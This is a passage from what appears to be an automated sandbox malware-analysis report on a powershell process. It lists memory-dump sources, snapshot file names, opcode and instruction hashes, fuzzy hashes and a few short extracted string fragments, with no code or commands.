      • Snapshot File: hcaresult_6_2_230000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 601af6b8753d9de6f9098dbc1fa692d0334fc9474dc771a060095f773a75a8ba
      • Instruction ID: 39b3525cc702afd67aa1366ec25f13bbebed9ae172ffb0d99e1fe7da55f283da
      • Opcode Fuzzy Hash: 601af6b8753d9de6f9098dbc1fa692d0334fc9474dc771a060095f773a75a8ba
      • Instruction Fuzzy Hash: 335148B4A216299FDB04CF98C484AADBBF1FF48320F548569E819AB351D770ED91CF90
      Memory Dump Source
      • Source File: 00000006.00000002.453235990.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_230000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 5bbb56e587d29ac023b38a25f97a849e23d43d7781d39dab579a83137a84881a
      • Instruction ID: db929ad8fef4150c499fe3bec3bf96ece586aa05012b8ce122cd87340e88b4e4
      • Opcode Fuzzy Hash: 5bbb56e587d29ac023b38a25f97a849e23d43d7781d39dab579a83137a84881a
      • Instruction Fuzzy Hash: 5551CA74A102099FDB14CFA9D484AADFBF2BF88314F24C559E808AB355C775ED82CB90
      Memory Dump Source
      • Source File: 00000006.00000002.453235990.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_230000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 0bb632b069cefd3da6d2edcd277d0d513ee60666905b3fa5127e4b4df502aa19
      • Instruction ID: 34ad1a71efa164c946b5441b9f0fbe051cbce9d0767a6a5e6697491c1e97e48b
      • Opcode Fuzzy Hash: 0bb632b069cefd3da6d2edcd277d0d513ee60666905b3fa5127e4b4df502aa19
      • Instruction Fuzzy Hash: FC41C774A10219EFDB14CFA4D584A9DFBF2FF88314F288559E409AB355C771AD82CB90
      Memory Dump Source
      • Source File: 00000006.00000002.453235990.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_230000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: ccd85ba2b78bfaecb1ad351a580425bd7b142d1af335cda99ffa04c4a3e0a153
      • Instruction ID: 8e58beb2d80ac0044ad172faff6bd76121c49f0e2bf8e72f81961a8e603c6b63
      • Opcode Fuzzy Hash: ccd85ba2b78bfaecb1ad351a580425bd7b142d1af335cda99ffa04c4a3e0a153
      • Instruction Fuzzy Hash: 4A2128B4A0061A9FCB14DF98C8809AEFBB2FF48310B2485A5E909E7751C731FC51CBA0
      Memory Dump Source
      • Source File: 00000006.00000002.453235990.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_230000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 61862451798204b57d9d481936836f06f111cccedd7a0b4fc481cd4b90365397
      • Instruction ID: 908fa1b253575dcbd55cdc522f968b7a7896062cc4764b973e2ff8c55b9648f6
      • Opcode Fuzzy Hash: 61862451798204b57d9d481936836f06f111cccedd7a0b4fc481cd4b90365397
      • Instruction Fuzzy Hash: AD11DA74A10209EFDB44CBE8D484B9DBBF1AF48314F24C555E808AB361C775ED82CB50
      Memory Dump Source
      • Source File: 00000006.00000002.453235990.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_230000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 83043195d38597df0ffeb9f4e376153f98866e75755b768578335c6d980e6146
      • Instruction ID: 3c9245670d76a5186ce2d8f39ce437f4e0952a1db6c1abe58a26d2b2a262121f
      • Opcode Fuzzy Hash: 83043195d38597df0ffeb9f4e376153f98866e75755b768578335c6d980e6146
      • Instruction Fuzzy Hash: 2511C874A10219EFDB05CF98D484F9DBBF2BF48324F298559E409AB361C771AC82CB80
      Memory Dump Source
      • Source File: 00000006.00000002.453216591.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_1dd000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: ba851b79b9146f7ae760f0298cc94efeb5dba3280d2bb4bd3663080ba7dd76c8
      • Instruction ID: 1d74f755023cc8b685a09fe0993a43db1378eb274457a9616726da00f34ee31a
      • Opcode Fuzzy Hash: ba851b79b9146f7ae760f0298cc94efeb5dba3280d2bb4bd3663080ba7dd76c8
      • Instruction Fuzzy Hash: 2B018F71504344ABE7104A26E8C4B66BF98EF91764F28856AFC494A382C3799945CAB2
      Memory Dump Source
      • Source File: 00000006.00000002.453216591.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_1dd000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: aebc399b3570bf269b4fa1ffda0d1e912909d56a0e66fbc8feb78df358a24c3b
      • Instruction ID: 28ece49b3066ed20a9a2576cde4a1869e8c9cc9c0df61389210ee89f20186f8e
      • Opcode Fuzzy Hash: aebc399b3570bf269b4fa1ffda0d1e912909d56a0e66fbc8feb78df358a24c3b
      • Instruction Fuzzy Hash: C1015E6140D3C09FD7128B259C94B52BFA4EF53624F1981DBE8888F293C2699848CBB2
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.453307174.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_480000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: @#ve$@#ve$L4#p$L4#p$L4#p$:9$:9$:9
      • API String ID: 0-380112588
      • Opcode ID: 7c82ddaf2ddfac4cb249f3c6c9733d92fc6022e064f6c39e0d7c81f88f081487
      • Instruction ID: bffc57bdf0e5470078299b70f6c811ce579c1fd958e7979fc1ce253cc0db21ba
      • Opcode Fuzzy Hash: 7c82ddaf2ddfac4cb249f3c6c9733d92fc6022e064f6c39e0d7c81f88f081487
      • Instruction Fuzzy Hash: 33613731B04214AFDB25AF64D800BAF7BAAAF81310F148867E901DF3A1CB75ED42C791
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.453307174.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_480000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: 4:9$4:9$4`se$@#ve$@#ve$99$99
      • API String ID: 0-2122739739
      • Opcode ID: d9342389bdd9728ae750e51f3688eea8856fd5e17bb11f9f3c01ec755e4ebe23
      • Instruction ID: a5f19b8c388b7cfb18c08450c48ff57a0b81f27a870e339e6e81dc010fa3b1e0
      • Opcode Fuzzy Hash: d9342389bdd9728ae750e51f3688eea8856fd5e17bb11f9f3c01ec755e4ebe23
      • Instruction Fuzzy Hash: 32C11335B042419FDB14AB68C840A6EB7EAEFD5310B2888BBD849CB361DB35DC43C795
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.453307174.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_480000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: @#ve$@#ve$@#ve$@#ve$@#ve$@#ve
      • API String ID: 0-1028220130
      • Opcode ID: e702f81be7c78fcc509d39e588dd05d824707af1bb354a6b414315b300da05e9
      • Instruction ID: 2d47485108e13f3c41daad8f0b51cdc8dc5bcacb582c04bd5fe993ebc4d9b118
      • Opcode Fuzzy Hash: e702f81be7c78fcc509d39e588dd05d824707af1bb354a6b414315b300da05e9
      • Instruction Fuzzy Hash: 3CF10035B002169FDB14AA74981076F7BA1AFC6310F2488BBD945DB391EB79CC42C7A6
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.453307174.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_480000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: @#ve$L4#p$L4#p$L4#p$:9$:9
      • API String ID: 0-265298053
      • Opcode ID: 44c35ac988ecb63f610e024169e745c2c38a2d1bb961131c63420ead97d64f8d
      • Instruction ID: c4b4a6063c1b0727675ef1b488304462cb24f5567588d5574cc29df07d4d5bed
      • Opcode Fuzzy Hash: 44c35ac988ecb63f610e024169e745c2c38a2d1bb961131c63420ead97d64f8d
      • Instruction Fuzzy Hash: 8A41E371A04244AFDF25AF14C840BBE77B9AF41310F088867E8059F3A2C7B8ED86CB55